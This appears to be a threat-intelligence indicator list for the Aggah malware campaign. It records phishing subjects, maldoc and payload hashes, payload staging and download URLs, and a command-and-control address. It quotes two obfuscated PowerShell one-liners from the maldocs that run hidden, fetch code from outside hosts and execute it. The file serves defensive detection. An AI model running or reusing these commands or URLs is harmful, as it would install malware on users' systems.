-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-18 Aggah IOCs
53 lines (38 loc) · 2.11 KB
/
2021-10-18 Aggah IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
THREAT ATTRIBUTION: AGGAH / HAGGA
SUBJECTS OBSERVED
Shipping Documents and Delivery Notice
Urgent Requirement ( RFQ NO: 1311719753)
RFP : 1311719753
SENDERS OBSERVED
MALDOC FILE HASHES
1311719753.ppt
3e804f9f266483ec4884546f08e396a8
Purchase orders with bank details.ppa
87b2f6337fbea5ee3f10eb1b210dd795
Shipment Documents.ppt
3e804f9f266483ec4884546f08e396a8
POWERSHELL FROM MALDOCS
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_15c2594b40a245a9936b81883534b8d8.txt').GetResponse().GetResponseStream()).ReadToend());
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/xXEKBr/ab183323ae3edc2de176d3cb703bf39982f72eb7/files/qwer1') -useB);
AGGAH PAYLOAD STAGING URLS
http://bitly.com/jfklsdjfsgyfsdhgfjksdh
http://bitly.com/ajdwwrufqwehjwijjd
http://bitly.com/jfklsdjfsgyfsdhgfjksdh
https://meinajkallunjaisahowawahun.blogspot.com/p/qwerty11111qq.html
https://www.blogger.com/blogin.g?blogspotURL=https://meinajkallunjaisahowawahun.blogspot.com/p/qwerty11111qq.html&type=blog
AGGAH PAYLOAD DOWNLOAD URLS
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt
https://bitbucket.org/!api/2.0/snippets/choasknight/xXEKBr/ab183323ae3edc2de176d3cb703bf39982f72eb7/files/qwer1
AGGAH PAYLOAD FILE HASHES
aggah1.exe
52353050649e9c0b212be44d26e8b4dd
aggah2.exe
a943bea8997dec969ba9cff3286ef6e2
AGGAH C2
http://103.125.190.248/j/p11l/mawa/0b5eace2c983ebeba55b.php
SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/8811a7bfc8b36649308ae32e37c3cfcd0e1bf700f34988bb9c7028a7d367d894
https://www.virustotal.com/gui/file/93002698d17ed42fda59a7a37533c12bd13ce27fae60d6673c7b71f94a0eccc7